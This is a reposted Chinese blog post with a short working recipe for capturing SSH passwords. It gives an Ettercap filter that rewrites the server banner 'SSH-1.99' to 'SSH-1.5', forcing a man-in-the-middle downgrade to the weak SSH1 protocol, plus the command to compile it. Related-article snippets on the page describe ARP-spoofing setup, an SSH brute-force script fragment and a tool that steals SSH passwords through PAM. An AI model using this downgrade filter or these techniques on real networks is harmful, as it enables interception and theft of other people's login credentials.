使用ettercap嗅探ssh口令

最新推荐文章于 2025-01-09 14:53:17 发布

转载最新推荐文章于 2025-01-09 14:53:17 发布 · 3.5k 阅读

文章标签：

#ssh #filter #search #服务器

本文介绍了一种通过修改 Ettercap 过滤器来实现对 SSH 协议版本进行降级的方法，从而使得 Ettercap 能够嗅探 SSH 1.5 版本的流量。

* 作者: xi4oyu(http://www.pentestday.com)
* 转载请注明出处

通常情况下我们判断目标的ssh能否被嗅探可以使用nc来确定。具体方法为nc targetip 22。

如果返回的版本号为SSH-1.99就表示在sshd_config中protcol 为2,1。

但默认从网上下的ettercap是不能嗅探ssh1的密码的，即使被嗅探的服务器被配置成了protcol 2,1也一样。

花了一会研究了下filter的写法，写了个ssh将ssh-1.99降到ssh-1.5的filter

if (tcp.src ==22 && search(DATA.data,"SSH-1.99")){

replace("SSH-1.99","SSH-1.5");

}

保存为sh.filter,编译方式为Etterfilter sh.filter -o sh.ef

启动ettercap的时候加载这个filter，看看，是不是能嗅了？

呵呵

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

cnbird2008

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

这39个端口黑客最常攻击，看看有哪些？

网络技术联盟站

08-28

848

在计算机网络中，端口是指网络通信的端点，用于标识网络中不同的服务或应用程序。每个端口都对应一个特定的网络协议，并且在一个主机的IP地址上可以有多个端口同时开放。端口的编号范围从0到65535，其中较低编号的端口通常用于众所周知的服务（称为“知名端口”），例如HTTP（80端口）、HTTPS（443端口）、FTP（21端口）等。这些端口由IANA（Internet Assigned Numbers Authority）分配给特定的服务和协议。常见的服务如HTTP、FTP、SMTP等都在此范围内。

Linux中ssh配置详解

小仙儿

11-18

1万+

Linux中ssh配置详解一、SSH概述 1、ssh定义百度百科中的解释：SSH 为Secure Shell的缩写，由 IETF 的网络小组（Network Working Group）所制定；SSH 为建立在应用层基础上的安全协议。SSH 是较可靠，专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序，后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞。SSH客户端适用于多种平...

参与评论您还未登录，请先登录后发表或查看评论

防范网络嗅探

最新发布

2401_88751289的博客

01-09

787

最普遍的安全威胁来自内部，同时这些威胁通常都是致命的，其破坏性也远大于外部威胁。其中网络嗅探对于安全防护一般的网络来说，操作简单同时威胁巨大，很多黑客也使用嗅探器进行网络入侵的渗透。网络嗅探器对信息安全的威胁来自其被动性和非干扰性，使得网络嗅探具有很强的隐蔽性，往往让网络信息泄密变得不容易被发现。本文分析了网络嗅探的原理，分析了一些实例，提出解决方案和介绍实践经验。一嗅探器攻击原理嗅探器(sniffer) 是利用计算机的网络接口截获目的地为其他计算机的数据报文的一种技术。它工作在网络的底层，把

SSH Keylogger密码抓取

The current road is different, love needs to distinguish between right and wrong

11-16

1262

SSH Keylogger终端切换用户记录用户输入的终端信息可获取密码主要利用strace系统调试工具获取ssh的读写连接的数据，以达到抓取管理员登陆其他机器的明文密码的作用。没有那么多天赋异禀，优秀的人总是努力地翻山越岭。

ssh远程登录可能出现的问题以及解决办法

samuel

12-11

1万+

首先、确保server端的ssh服务是开的（service shhd start）然后在client端输入： ssh usrname@serverip （远程登录） scp filename usrname@serverip：/URL (远程传输) 常出现的问题：问题一 ssh登录的时候链接端口失败提示（1）： # ssh 192.1

思科SSH配置

junlan的博客

01-03

2万+

R1(config)#hostname R1 //配置ssh的时候路由器的名字不能为router R1(config)#aaa new-model //默认是no aaa new-model，如果配置为aaa new-model，line vty就不需要配置login local R1(config)#ip domain-name cisco //SSH的关键字名就是hostnam...

SSH协议弱加密算法漏洞的利用及复（间攻）

长亭路

04-22

1432

SSH协议弱加密算法漏洞的利用及复现（中间人攻击） SSH协议弱加密算法漏洞的利用及复现（中间人攻击）很多服务器或者交换机是存在SSH协议弱加密算法漏洞的，但是该漏洞如何利用呢？最近研究了下此漏洞的相关利用方法，对其整个攻击过程进行了复现。哈哈，本文具体操作步骤适合小白操作，也欢迎大神指正，希望大神对于此漏洞利用提出一些想法或者更好，更便捷的方法，促进交流哈！

SSH协议弱加密算法漏洞的利用及复现（中间人攻击）

qq_32006199的博客

04-10

1万+

SSH协议弱加密算法漏洞的利用及复现（中间人攻击）很多服务器或者交换机是存在SSH协议弱加密算法漏洞的，但是该漏洞如何利用呢？最近研究了下此漏洞的相关利用方法，对其整个攻击过程进行了复现。哈哈，本文具体操作步骤适合小白操作，也欢迎大神指正，希望大神对于此漏洞利用提出一些想法或者更好，更便捷的方法，促进交流哈！

SSH V2的中间人攻击

ytfhjhv的博客

01-22

2055

SSH V2的中间人攻击

1.1网络侦察实验

baidu_39662147的博客

03-03

1681

如题，主要是几种工具和攻击的简单实现。（写这篇文章的时候已经到第四个任务了，故无图）本次实验是在一个局域网中实现，攻击目标的靶机和养病毒的蜜罐差不多。平常的机子有防火墙都ping不到，日常成功的可能性极小。 1.nmap和ettercap nmap可以用来扫描网络中的存活主机，还可以扫描出端口、服务、操作系统、版本信息等，具体使用放到后面了。 ettercap是一个基于ARP地址欺骗方式的网络...

ssh连不上问题解决方法

热门推荐

jiahehao的专栏

04-13

9万+

问题：能ping通Linux服务器但是ssh连不上解决方法这个问题花了我20分钟去查资料，网上写的解决方法也是五花八门，不过，总算解决了，分享出来和大家一起学习。服务器正常，PING也能PING通。但是就是SSH连不上啊，出现这种问题，最大的可能就是防火墙没有关闭。解决方法：一、开启SSH以root用户登录Linux，打开终端，运行： /etc/init.d/

SSH

07-17

212

SSH 创建的会话更安全。SSH 使用加密密钥发送数据，以免以明文方式发送用户名和密码。设置 SSH 的步骤如下:(1) 设置主机名:Router(config)#hostname Todd(2) 设置域名(为生成加密密钥，必须有用户名和域名):Todd(config)#ip domain-name Lammle.com(3) 将用户名设置成支持 SSH 客户端接入:Todd(config)#u...

Telnet、SSH（SSH1和SSH2）之间的区别

xiongmimi的博客

03-08

2082

简言之：Telent是明码传输，SSH是加密传输。使用Telnet这个用来访问远程计算机的TCP/IP协议以控制你的网络设备相当于在离开某个建筑时大喊你的用户名和口令。很快会有人进行监听，并且他们会利用你安全意识的缺乏。传统的网络服务程序如：ftp、pop和telnet在本质上都是不安全的，因为它们在网络上用明文传送口令和数据，别有用心的人非常容易就可以截获这些口令和数据。而且，这...

牛掰！SSH端口嗅探方法及其防御技术

Appleteachers的博客

05-05

1610

SSH端口嗅探方法及其防御技术众所周知，SSH是一种安全的网络协议，在本质上是安全的，不会受到网络数据包嗅探和窃听的威胁，因为该协议应用了加密技术。如果我们安全地使用SSH协议，那么遭受中间人攻击的风险确实是很小的。然而，这并不意味着SSH是100%安全的，也无法防御所有的嗅探攻击。我们通过SSH连接到服务器时，并不意味着没有人可以看到我们正在做什么。这篇文章的主题是关于SSH会话嗅探、SSH窥探、SSH间谍的，或者您随便怎么称呼它都可以。虽然这不是什么新鲜技术，并且已经存在了很长时间，但时常回顾一下

linux嗅探工具

martin2350的专栏

09-28

2753

Dsniff是一个著名的网络嗅探工具包。其开发者Dug Song早在1999年12月，以密歇根大学CITI研究室（Center for Information Technology Integration）的研究成果为基础，开发了这个后来具有很大影响力的网络安全工具包。Dug S

SSH安全方案的解决方法

LeeKwen的专栏

03-02

9455

SSH防暴力破解的解决方法

sshLooter - 窃取SSH密码的脚本

weixin_34088838的博客

11-24

475

　　　sshLooter是一个Python脚本，它使用PAM模块通过记录密码来窃取SSH密码，并在用户登录时通过Telegram通知脚本管理员，而不是通过不太可靠的strace。 def check_pw(user,password): """Check the password matches local unix password on file""" h...

通过 Pxssh 暴力破解 SSH 密码

zwlww1的博客

01-05

724

#!/usr/bin/python #coding=utf-8 from pexpect import pxssh import optparse import time from threading import * #最大连接数被设置为5，在每个thread启动时注册一个信号量，在connect函数结束时注销这个信号量，这样同时存在的线程数量就被控制为5个。 maxC

ettercap 嗅探

01-06

### 使用 Ettercap 进行网络嗅探 Ettercap 是一个强大的基于 ARP 地址欺骗方式的网络嗅探工具，主要用于交换局域网环境中的安全评估和渗透测试。该工具能够帮助检测网络内的明文数据通信安全性，从而防止敏感信息如用户名和密码以明文形式传输[^2]。 #### 启动 Ettercap 并进入图形界面模式要启动 Ettercap 图形界面版本，在命令行输入 `ettercap-gtk` 或者通过桌面快捷方式进行启动。如果安装的是命令行版，则需使用 `-C` 参数运行命令行模式下的 Ettercap。 #### 设置目标主机与网关 1. **扫描主机**: 在主界面上点击 "Sniff" 菜单并选择 "Unified sniffing..." 来打开接口列表窗口；接着选中用于捕获流量的网络适配器（通常是连接到互联网的那个），之后会自动开始扫描同一子网上的活动设备。 2. **标记目标**: 扫描完成后可以在左侧栏看到已发现的目标机器列表。右键点击想要攻击的目标 IP 地址，并将其加入“Targets”。 3. **设置中间人位置**: 右键点击代表默认路由或网关的那一项，同样把它设为目标之一。这一步是为了让所有进出的数据包都经过本机转发。 #### 开启 ARP 欺骗模块为了实现透明监听其他计算机之间的对话而不被察觉，需要开启 ARP 中毒插件： - 导航至 Plugins -> Manage the plugins... - 查找名为 “arp_poison”的条目并启用它此时已经成功配置好了基本的工作环境，准备就绪后就可以实施实际抓取动作了。 #### 实施数据捕捉过程回到顶部菜单栏找到 Sniff 下拉选项里的 Start button 即可激活实时监控状态。现在所有的 HTTP 请求响应以及其他未加密协议产生的内容都将被捕获下来供后续审查分析之用。请注意，Ettercap 功能强大但也存在风险，只应用于合法的安全评测工作当中，并且务必获得相应许可后再行动[^1]。 ```bash sudo ettercap -G # 启动带有GUI界面的Ettercap ```